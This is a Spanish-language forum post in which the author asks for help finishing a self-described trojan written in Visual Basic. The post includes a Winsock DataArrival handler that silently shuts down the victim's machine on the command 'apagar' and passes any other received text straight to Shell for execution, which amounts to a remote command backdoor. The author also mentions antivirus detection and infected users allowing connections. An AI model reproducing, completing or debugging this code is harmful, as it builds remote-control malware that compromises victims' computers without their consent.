yo,tengo el codigo de mi troyano hecho,el unico problema esq en el data arrival del server,para ejecutar kualkier archivo,tengo q colocar un "Else"(para q si los dats no son los definids anteriormente ejecute los nuevos datos...),bueno,pues esto obviamente funciona correctamente,el problema,esq yo quiero tambien q el server muestre un msgbox con los dats q lleguen,pero sin ejecutar a la vez estos...os pongo un ejemplo de lo k ocurre(no es mi troyano,es un ejemplo simple para q se entienda...):::
Código:
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
Winsock1.GetData datos
If datos = "apagar" Then
Shell "shutdown -s -t 00", vbHide
Else 'aki esta mi problema,q si los datos no son "apagar",ejecuta,hace un msgbox....
Shell datos, vbMaximizedFocus ' esto ejecuta los datos...pero y si yo quiero tener las 2 funciones(q ejecute y q cree un msgbox???)
End If
End Sub
el code esta perfecto,pero si yo quiero tener en el "else" dos funciones(ejecutar y enviar un msgbox)puedo??
esq lo q me sucede esq primero envia un msgbox con los datos,y despues ejecuta mi programa...
siento si esta un poco lioso pero esq es dificil de explicar..
pd:yo solucione este problema creando dos winsock,y q en el data arrival de uno ejecutara y en el otro creara un msgbox,pero es demasiado xapucero y da problemas cn los antivirus etc(por q si el infectado permite una conexion bieeen!! pero no creo q sea tan estupido de permitir varias conexiones del mismo programa en distintos puertos...)
un saludo y gracias de antemano